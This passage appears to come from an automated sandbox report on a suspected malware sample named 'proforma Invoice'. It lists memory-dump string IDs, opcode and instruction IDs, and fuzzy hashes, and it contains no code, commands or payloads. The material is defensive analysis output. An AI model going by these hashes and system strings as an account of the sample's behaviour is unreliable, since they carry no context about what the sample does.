                                                                          • kLsE, xrefs: 01160540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0116063D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0116A309
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0116A2FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalTags
                                                                          • API String ID: 0-1106856819
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .mui
                                                                          • API String ID: 0-1199573805
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: EXT-
                                                                          • API String ID: 0-1948896318
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryHash
                                                                          • API String ID: 0-2202222882
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryName
                                                                          • API String ID: 0-215506332
                                                                          Strings
                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011E895E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                          • API String ID: 0-702105204
                                                                          • Instruction ID: 566769a8a373f9e0e5ed55d376fb107ed8055597e0e0f38741e29072d944a487
                                                                          • Opcode Fuzzy Hash: b178549d4fe3c2fd6b9f646376500fd3d073cc53952850d7ae29152e41047dce
                                                                          • Instruction Fuzzy Hash: 02C17974108341DFD768CF18C484BABB7E8BF98708F44495DE98987291E775EA08CF92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ef2455be5757cfbf2bdf2be003a1bf2823239269f6507db9356582d74db7792
                                                                          • Instruction ID: 5943be7eba3ce00281b4322afc23d41d56f153af34bd57dbfb099f1e2a244276
                                                                          • Opcode Fuzzy Hash: 5ef2455be5757cfbf2bdf2be003a1bf2823239269f6507db9356582d74db7792
                                                                          • Instruction Fuzzy Hash: 7BB19370B10265CBDB68CF58C890BA9B7F5EF44704F0485E9D91AE7241EB709E86CF61
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e51fdff929ff5436a95421b466f770d3bb8c4593daf7e7b7dd930e006f73a173
                                                                          • Instruction ID: 7337020da4841513c94dceac6b464b63d4e9c904307f22b7e4bb0d204e6c9a39
                                                                          • Opcode Fuzzy Hash: e51fdff929ff5436a95421b466f770d3bb8c4593daf7e7b7dd930e006f73a173
                                                                          • Instruction Fuzzy Hash: 2EA15931E01616AFEB2DEB9CC848FADBBB5AF00B18F154115EA11A7290D7749D41CFD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d08e34e443c486eb88df93dd26c6b646ea9b0d0914c840a2ec137cd4eee7deab
                                                                          • Instruction ID: 6ab7135ad73a767069dbda8159c2637e60e0934f598b9596abd71d42a533a2f6
                                                                          • Opcode Fuzzy Hash: d08e34e443c486eb88df93dd26c6b646ea9b0d0914c840a2ec137cd4eee7deab
                                                                          • Instruction Fuzzy Hash: 0AA1D575B0071A9FDB2DDF69C590BAABBB1FF58318F444029FA4597282EB34E811CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 222c060e2c5a78b5ef7a7361e3fd85463642604bb7f09b2e91b306a0f1abd43c
                                                                          • Instruction ID: 719de24e6f22b41d7d19e0cc9b0c43d966e7a5372aba8fd64724ff3a8ff5ca9f
                                                                          • Opcode Fuzzy Hash: 222c060e2c5a78b5ef7a7361e3fd85463642604bb7f09b2e91b306a0f1abd43c
                                                                          • Instruction Fuzzy Hash: 8EA1E1B2A24292DFC716EF18CD80B5ABBE9FF98708F4405A8E6459B750D334ED01CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 948011072a74877740c1b0a19d9264046d7d7320a92b40b9b1100415f436b203
                                                                          • Instruction ID: 1c805eb68fb9974f941e74c133cfb56711d513df56e22bfeb89be6bd769587a2
                                                                          • Opcode Fuzzy Hash: 948011072a74877740c1b0a19d9264046d7d7320a92b40b9b1100415f436b203
                                                                          • Instruction Fuzzy Hash: EC91D071E04616AFDF19CFA8D888BAEBFF5AF58700F554169E614AB341D734E900CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 614da2176515e04cfc551f80174c016284d43f9bad9e3e2449221adc856b918c
                                                                          • Instruction ID: f5e9d1684722b9284e0eedc0082fbad44c1153da1e81cf1618d88443869ae319
                                                                          • Opcode Fuzzy Hash: 614da2176515e04cfc551f80174c016284d43f9bad9e3e2449221adc856b918c
                                                                          • Instruction Fuzzy Hash: B6910475A0161ACBEB2C9B68C484BBE7BF1EF94B18F1541A9E906DB340F734D901CB52
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5229874b1f031b0ad053e4d86b30f536f11e740d39079a9765ccc55f786ac16b
                                                                          • Instruction ID: 1db943483246d2592cfbbad8bda9d0ca1ab5df05ae47b0473d1b79fac021f3b1
                                                                          • Opcode Fuzzy Hash: 5229874b1f031b0ad053e4d86b30f536f11e740d39079a9765ccc55f786ac16b
                                                                          • Instruction Fuzzy Hash: 70819371A0061A9BDB1CCF69C990AFEBBF9FB58700F04852EE555E7640E334E940CBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction ID: 91b5a3286d3d357e7a00048b5ebde17e0ae1c1a4cb8d44ea45500517bd3f7898
                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction Fuzzy Hash: 2381A531A20216AFDF19CF58C481ABEBBF6FF94310F148569D9169BB85DB74D901CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ddeaf1bfaa20aba99f297575867b51960cd47e8cebdf8b12bb4ada28e79d7f78
                                                                          • Instruction ID: e9b29736bd2048adef3758711461374f1d765602027bad92a436fd4ff9934e21
                                                                          • Opcode Fuzzy Hash: ddeaf1bfaa20aba99f297575867b51960cd47e8cebdf8b12bb4ada28e79d7f78
                                                                          • Instruction Fuzzy Hash: FD71A0F560431A9BDB2DCF19C8C0BAEB7E4BB48358F154929EB55D7200E730E946CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c010935da664cbcb1b30cfd1c03765344c0b4a2bf436c6bf3db05736102a2a0
                                                                          • Instruction ID: 8fb3cb230e017a97351f403427eb107e6b9e68554baf8d69884773968df54454
                                                                          • Opcode Fuzzy Hash: 7c010935da664cbcb1b30cfd1c03765344c0b4a2bf436c6bf3db05736102a2a0
                                                                          • Instruction Fuzzy Hash: 09816E71A05609EFDB29CFA9C880BEEBBBAFF48354F104429E565A7250D730AD45CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9524ce7526d21183902f4cd292e3466a70ecbeeb86f83b433f67c626b49b029e
                                                                          • Instruction ID: 3bdd8e5536997967243d1bcbda8f6ca313fd50420365bc7e4334afe5c97c73dc
                                                                          • Opcode Fuzzy Hash: 9524ce7526d21183902f4cd292e3466a70ecbeeb86f83b433f67c626b49b029e
                                                                          • Instruction Fuzzy Hash: EB719CB5D046669BCB298F59D8907FEBBB5FF68B10F15415EE942AB350E7309800CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc64f7ea6ba26a99f8558957c26e01f375c17caa7b9f2dc2f4f520a76536887c
                                                                          • Instruction ID: b74b3e0513d188160c76e6144e819c27c7e2e01e1f12435f1ad3383c71fc6ea9
                                                                          • Opcode Fuzzy Hash: cc64f7ea6ba26a99f8558957c26e01f375c17caa7b9f2dc2f4f520a76536887c
                                                                          • Instruction Fuzzy Hash: 9E71D1749042669FCB19DF59C840AFEBBF1FF85304F048069EA99DB242E335EA45C7A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f290307f2592ed2d45f1fbb7eff231444187fc68224e4ee71f4127367e82568a
                                                                          • Instruction ID: 81169d46e2e7ef45623eaac18e9808dca3f65158e85dcca997dba4a51105b491
                                                                          • Opcode Fuzzy Hash: f290307f2592ed2d45f1fbb7eff231444187fc68224e4ee71f4127367e82568a
                                                                          • Instruction Fuzzy Hash: A271DF356046428FD31ADF2CC480B2AB7F5FF98314F0585AAE8988B352DB34D946CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                          • Instruction ID: 73dcd87bd511606da321580f37b662b6ab9732955f318e4082c4ba0496398349
                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                          • Instruction Fuzzy Hash: 22718C71A0061AAFDB18DFA9C984EEEBBF8FF48304F104569E505E7250DB70EA41CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: efecb895ef9c665135913eec91af55d1cd2df71b3d14f1815d2e758080936127
                                                                          • Instruction ID: 4e9e1d56263989b9e66563f0af3f0865cdebb52d2727d92299157b780fd5d130
                                                                          • Opcode Fuzzy Hash: efecb895ef9c665135913eec91af55d1cd2df71b3d14f1815d2e758080936127
                                                                          • Instruction Fuzzy Hash: A271E136200B01AFE73AEF18C854F5ABBB6EF40724F15492CE35A8B6A1D775E944CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6fb0464a4d363789c40901fe48ef25df69e3a2729afcbf22afbe00a73f9d88f
                                                                          • Instruction ID: ea33f0ed2203738b674fea82e2c7e08e320bf23bb8ca3638b789d718ad73a833
                                                                          • Opcode Fuzzy Hash: a6fb0464a4d363789c40901fe48ef25df69e3a2729afcbf22afbe00a73f9d88f
                                                                          • Instruction Fuzzy Hash: D381DF72A183468FDB2CCF9CE488BADB7B6BF58718F16412DD900AB281D7759D41CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 13486964e06390e425c29cd41f897617a61f302ffd9e5e1278eb537a273fae9b
                                                                          • Instruction ID: 83a788b499d22443867db2a4c0382caed20ebe7569193ff4accc6b33994282a1
                                                                          • Opcode Fuzzy Hash: 13486964e06390e425c29cd41f897617a61f302ffd9e5e1278eb537a273fae9b
                                                                          • Instruction Fuzzy Hash: 0A619D71A002169FDF1DDF68C880BAEBBB5FF48318F15456AE622EB291D7309941CF91
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 459caeea7a1fb3101b388379efdac5cf07bbb3d900100e634db3361115a1dd3a
                                                                          • Instruction ID: 808138096a5c8cad1f8cb8772a7b48615c84aa4dd8157443168bb2e9c02e4d84
                                                                          • Opcode Fuzzy Hash: 459caeea7a1fb3101b388379efdac5cf07bbb3d900100e634db3361115a1dd3a
                                                                          • Instruction Fuzzy Hash: 8651DB71201752AFDB2CEF59C884B6AB7B9FB5070DF10882EE00283A81D774E845CF92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          • Instruction ID: 9f898ab02875fcb7bf7e820449882bbee40a2367bfeeb155ed08b7b095ca7d6f
                                                                          • Opcode Fuzzy Hash: bd1a302c6a31b96d8467ce007c3d5752298bacffd31658176b964788bc426354
                                                                          • Instruction Fuzzy Hash: 574104B0901701CFCB2DEF28D980B69B7F9FF54318F1182A9C8169B6A1EB319941CF51
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8410185a3ede17ecd3fec5e0f87e16b63eb982b7b10b43dd4ba92396a3235d6f
                                                                          • Instruction ID: 20467f4fd6ccc35b3a0084c590462132cc8da629c4f4ae728c98026007a10477
                                                                          • Opcode Fuzzy Hash: 8410185a3ede17ecd3fec5e0f87e16b63eb982b7b10b43dd4ba92396a3235d6f
                                                                          • Instruction Fuzzy Hash: 68318CB1A00355DFDB19CF58C440799BBF0FB49718F2085AED119EB291E3369902CF90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80f57dec846052f4aaa14bc7f9207c229c7fbc00dec4035aaf232d7929f1ea6c
                                                                          • Instruction ID: 28ebb3a2cab58a7e51b3c6099da5832450454e5812f9d767b2a6bb39e49c90a1
                                                                          • Opcode Fuzzy Hash: 80f57dec846052f4aaa14bc7f9207c229c7fbc00dec4035aaf232d7929f1ea6c
                                                                          • Instruction Fuzzy Hash: 3441AE71A08301AFD724DF69C885F9BBBE8FF88624F004A2EF598D7250D7709904CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3fe7ae81915f139e52c4600af153a3fbf4d5eb3a764fef8e2b935145ee7b470
                                                                          • Instruction ID: 0befc2b873109ad483bef87d55b57c616f5634c6d2ec0d57f79ddc32f70ffea2
                                                                          • Opcode Fuzzy Hash: a3fe7ae81915f139e52c4600af153a3fbf4d5eb3a764fef8e2b935145ee7b470
                                                                          • Instruction Fuzzy Hash: 2E41C372604A429FD328DFA8C844B6AB7E9FFCC700F140A1DF95597680E770E905CBA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b3266f2c5779e03c623583448b2ac02d45ebab5d306e54a6101848f478ad065c
                                                                          • Instruction ID: c7a70e9dc9193a9cb33c78d30c39b5d8dc97a2deeee23c14d4f5106edd2678dc
                                                                          • Opcode Fuzzy Hash: b3266f2c5779e03c623583448b2ac02d45ebab5d306e54a6101848f478ad065c
                                                                          • Instruction Fuzzy Hash: 0F41D3302443028FD72DDF28D894B2ABBEEEF84754F14442DEA558B691EB32D961CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction ID: 157c0d7955cf89e568333d363686090f735c174a1a9cea2da04d71747cf93d5d
                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction Fuzzy Hash: A0312731A08344AFDB19CB68CC80B9BBFF9AF19350F0581A6F815D7352D7749844CBA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c846d4e3ede5185b8f6c310ff4d0515228c7f58fad49f8efae6f458322e7373
                                                                          • Instruction ID: 7a7290fdd715f81ce8b20fbb055caebe5fb22e04e8daf50291dd0e8d9a58f217
                                                                          • Opcode Fuzzy Hash: 9c846d4e3ede5185b8f6c310ff4d0515228c7f58fad49f8efae6f458322e7373
                                                                          • Instruction Fuzzy Hash: 9041DF35200B45DFD72ACF28C980BE6BBEAAF58714F01842DF65A8B650D735E810CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                          • Instruction ID: cfdbf4b91206f1ff9c865d8a379491fd32078cc54c5ce9531507625ad61441f1
                                                                          • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                          • Instruction Fuzzy Hash: 1131E672115346AFE717DF14C801F6BBBACEB506A0F044A2EF95097292E770ED05CBA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0dd1a87cd797608c67afe35d6fd193b3ad628c46d5f47a5e00f252a882f97be0
                                                                          • Instruction ID: f7f5717eb8ddad915682bfe81f4ad1e1ce5eabe4969ab065b8bc4cc65ab2c0ca
                                                                          • Opcode Fuzzy Hash: 0dd1a87cd797608c67afe35d6fd193b3ad628c46d5f47a5e00f252a882f97be0
                                                                          • Instruction Fuzzy Hash: 6831C4327026829BF73E575CCD48B257BE8BF44B49F1D00A4AB459F6D2DB68E840C321
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ec47bd274bfad08bc36f753f74f79a5458b0ed02163ec8b5707f5e03c27d6af3
                                                                          • Instruction ID: d893e6295db018eeda8fe9d03d1e7c17cea77393aca27087a46773f8062decd4
                                                                          • Opcode Fuzzy Hash: ec47bd274bfad08bc36f753f74f79a5458b0ed02163ec8b5707f5e03c27d6af3
                                                                          • Instruction Fuzzy Hash: 9131E476A10266BBDB15DF98CC40BAEB7B5FB45744F454268EA00AB244D7B0ED00CBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 678cca88c394dc16c2b0cdb10b2b58773752bfd1b58f5274c2ffc0924e51b0df
                                                                          • Instruction ID: c90f421ca43c93de461f064b8cac20b8ae1aa79f5dd535757fe797ee469fc0d4
                                                                          • Opcode Fuzzy Hash: 678cca88c394dc16c2b0cdb10b2b58773752bfd1b58f5274c2ffc0924e51b0df
                                                                          • Instruction Fuzzy Hash: ED318936A5016DABCF22EF54DD44BDE7BB9AB98310F1041E5A608A7251CB30DE51CF90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
